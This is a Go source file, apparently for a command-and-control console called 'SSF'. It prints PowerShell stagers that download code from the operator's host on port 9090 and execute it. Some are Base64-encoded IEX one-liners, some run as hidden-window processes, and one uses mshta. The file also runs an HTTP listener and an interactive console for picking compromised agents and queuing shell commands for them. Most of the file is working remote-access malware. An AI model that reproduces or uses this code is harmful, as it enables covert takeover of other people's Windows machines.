	payload := "$V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;$S=$V.DownloadString('http://" + Host + ":9090/get');IEX($s)"

	strbytes := []byte(payload)
	encoded := base64.StdEncoding.EncodeToString(strbytes)
	// fmt.Println(encoded)
	command := "Start-Job -scriptblock {iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('" + encoded + "')))}"
	fmt.Printf("%s %s \n", red("[+]"), command)
	fmt.Println("\n")

	command = "Start-Process powershell -ArgumentList " + "\"iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('" + encoded + "')))\"" + " -WindowStyle Hidden"
	fmt.Printf("%s %s \n", red("[+]"), command)
	fmt.Println("\n")

	command = "mshta http://" + Host + ":9090/hjf"
	fmt.Printf("%s %s \n", red("[+]"), command)
	fmt.Println("\n")

	//---------------------------------------------------------------
	// Same string as payload above; the three lines are printed again under headings.
	payload_JOB := "$V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;$S=$V.DownloadString('http://" + Host + ":9090/get');IEX($s)"

	strbytes_JOB := []byte(payload_JOB)
	encoded_JOB := base64.StdEncoding.EncodeToString(strbytes_JOB)
	//---------------------------------------------------------------
	commandJ := "Start-Job -scriptblock {iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('" + encoded_JOB + "')))}"
	//commandF = commandJ
	fmt.Printf("%s %s \n", Blue("[*]"), "---+Powershell JOB Payload+---")
	fmt.Printf("%s %s \n", red("[+]"), commandJ)
	fmt.Println("\n")
	//---------------------------------------------------------------
	commandP := "Start-Process powershell -ArgumentList " + "\"iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('" + encoded + "')))\"" + " -WindowStyle Hidden" // uses encoded, not encoded_JOB (same content)
	fmt.Printf("%s %s \n", Blue("[*]"), "---+Powershell New Process Payload+---")
	fmt.Printf("%s %s \n", red("[+]"), commandP)
	fmt.Println("\n")
	//---------------------------------------------------------------
	commandF_IP := "$V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;$S=$V.DownloadString('http://" + Host + ":9090/hjf');IEX($s)"
	commandF_strbytes := []byte(commandF_IP)
	commandF_encoded := base64.StdEncoding.EncodeToString(commandF_strbytes)
	commandF := "iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('" + commandF_encoded + "')))"
	fmt.Printf("%s %s \n", Blue("[*]"), "---+Powershell JOB + File Payload+---")
	fmt.Printf("%s %s \n", red("[+]"), commandF)
	fmt.Println("\n")
	//---------------------------------------------------------------
	simple_payload := "powershell -w hidden \"$h = (New-Object Net.WebClient).DownloadString('http://" + Host + ":9090/get');Invoke-Expression $h;\""

	simple_payload2 := "powershell -w hidden \"IEX(New-Object Net.WebClient).DownloadString('http://" + Host + ":9090/get');\""
	simple_payload3 := "powershell -w hidden \"Invoke-Expression(New-Object Net.WebClient).DownloadString('http://" + Host + ":9090/get');\""
	fmt.Printf("%s %s \n", Blue("[*]"), "---+ Powershell simple payloads +---")
	fmt.Printf("%s %s \n", red("[+]"), simple_payload)
	fmt.Println("\n")
	fmt.Printf("%s %s \n", red("[+]"), simple_payload2)
	fmt.Println("\n")
	fmt.Printf("%s %s \n", red("[+]"), simple_payload3)
	fmt.Println("\n")
}

//---------------------------------------------------------------

// Scanf reads one line from stdin for the Console_shell prompt. "info",
// "help" and "back" are handled locally and clear *a; any other text is
// stored in *a. Options passes &cmd, so that text is what the selected agent
// receives on its next /cm poll. A new bufio.Reader is created per call;
// bytes it buffered past the first line could be lost (presumably harmless
// for typed input — verify if input is ever piped). Read errors are ignored.
func Scanf(a *string) {
	reader := bufio.NewReader(os.Stdin)
	data, _, _ := reader.ReadLine()
	if string(data) == "info" {
		*a = ""
		info_os() // print the agent table
		return
	} else if string(data) == "help" {
		*a = ""

		fmt.Println(help_shell)
		return
		// help text for the shell sub-prompt
	} else if string(data) == "back" {
		*a = ""
		back = "back" // sentinel read by Options to leave the shell loop
		return
	}
	*a = string(data)

}

// clear clears the terminal with "cmd /c cls" on Windows and "clear"
// elsewhere. cmd.Start after cmd.Run returns an "already started" error that
// is dropped, so the second call does nothing; Run's own error is ignored too.
func clear() {
	if runtime.GOOS == "windows" {
		cmd := exec.Command("cmd", "/c", "cls")
		cmd.Stdout = os.Stdout
		cmd.Run()
		cmd.Start()
	} else {
		cmd := exec.Command("clear")
		cmd.Stdout = os.Stdout
		cmd.Run()
		cmd.Start()
	}
	// screen-clear helper used once at startup (see main)
}

// completer supplies the top-level menu entries for go-prompt, filtered by
// the word before the cursor (case-insensitive prefix match).
func completer(in prompt.Document) []prompt.Suggest { // first-level menu list
	s := []prompt.Suggest{
		{Text: "help", Description: "Help menu"},
		{Text: "set Host", Description: "Setting IP address "},
		{Text: "session list", Description: "List os Info"},
		{Text: "Interact", Description: "Interact with AGENT"},
		{Text: "shell", Description: "shell => powershell.exe"},
		{Text: "exit", Description: "Exit the program"},
		{Text: "del", Description: "del session id"},
	}
	return prompt.FilterHasPrefix(s, in.GetWordBeforeCursor(), true)
}

// del_session removes the agent named after "del " from AGENTS. The "[1]"
// index runs before the length check, so a bare "del" with no argument
// panics (index out of range) and the else branch is unreachable; it also
// overwrites session_id as a side effect. The delete is unsynchronized with
// the handler goroutines (see var block).
func del_session(id string) {
	Blue := color.New(color.FgBlue).SprintFunc()
	Red := color.New(color.FgRed).SprintFunc()
	session_id = strings.Split(id, " ")[1]
	if len(strings.Split(id, " ")) > 1 {
		delete(AGENTS, session_id)
		fmt.Printf("%s del Session id=> %s.\n", Blue("[*]"), session_id)
	} else {
		fmt.Printf("%s could not find it id %s \n", Red("[*]"), session_id)
	}
}

// Session_id selects the agent whose /cm polls will receive cmd, from the
// word after "Interact ". The id is not checked against AGENTS, so a typo
// silently selects nothing and commands are never delivered.
func Session_id(id string) {
	Blue := color.New(color.FgBlue).SprintFunc()
	Red := color.New(color.FgRed).SprintFunc()
	if len(strings.Split(id, " ")) > 1 {
		session_id = strings.Split(id, " ")[1]
		fmt.Printf("%s setting Session id=> %s.\n", Blue("[*]"), session_id)
	} else {
		fmt.Printf("%s set Session id err \n", Red("[*]"))
	}

}

// Options is the top-level console loop ("SSF >"). "shell" enters a nested
// loop that feeds Scanf until it sets back. Dispatch for "Interact" and "del"
// uses strings.Contains, so any input containing those substrings reaches
// the handler. "exit" calls os.Exit, which makes the following break
// unreachable. Runs on the main goroutine alongside the HTTP server.
func Options() { // drop-down menu option parameters
	for true {
		options := prompt.Input("SSF >", completer,
			prompt.OptionPrefixTextColor(prompt.Red),                 // prompt text colour
			prompt.OptionPreviewSuggestionTextColor(prompt.Black),    // drop-down text colour
			prompt.OptionSelectedSuggestionBGColor(prompt.LightGray), // selected entry background
			prompt.OptionSuggestionBGColor(prompt.DarkGray))          // menu box background

		if options == "shell" {
			for true {
				fmt.Print("Console_shell >")
				Scanf(&cmd)
				if back == "back" {
					back = ""
					break
				}

			}
		} else if options == "help" {
			fmt.Println(help)
		} else if strings.Contains(options, "Interact") {
			Session_id(options)
		} else if strings.Contains(options, "del") {
			del_session(options)
		} else if options == "session list" {
			info_os()
		} else if options == "exit" {
			os.Exit(0)
			break
		} else if options == "set Host" {
			Hosts()
		}

	}

}

// main registers httpserver for every path, starts the default HTTP server on
// :9090 in a goroutine (its error, e.g. port already in use, is silently lost,
// and no read/write timeouts are configured), clears the screen and then
// runs the console loop on the main goroutine.
func main() {
	AGENTS = make(map[string]string)
	http.HandleFunc("/", httpserver) // single route for everything

	go http.ListenAndServe(":9090", nil) // fixed listening port
	clear()                              // system clear
	Options()

}
--------------------------------------------------------------------------------